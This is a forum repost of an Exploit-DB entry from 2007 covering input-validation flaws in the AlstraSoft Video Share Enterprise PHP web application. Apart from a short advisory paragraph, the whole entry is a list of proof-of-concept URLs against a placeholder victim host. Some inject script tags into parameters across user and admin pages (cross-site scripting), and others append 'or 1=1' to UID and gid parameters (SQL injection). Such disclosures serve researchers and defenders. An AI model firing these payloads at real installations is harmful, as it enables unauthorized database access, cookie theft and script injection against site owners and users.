- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 30366
- Проверка EDB
-
- Пройдено
- Автор
- LOSTMON
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2007-07-23
Код:
source: https://www.securityfocus.com/bid/25019/info
AlstraSoft Video Share Enterprise is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting vulnerabilities and multiple SQL-injection vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>
http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>
http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr
http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=
http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>
http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>
http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>
http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search
http://[Victim]/videoshare/siteadmin/muser.php?
[email protected]&uname=GLAMOROUS"><script>alert()</script>
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1- Источник
- www.exploit-db.com
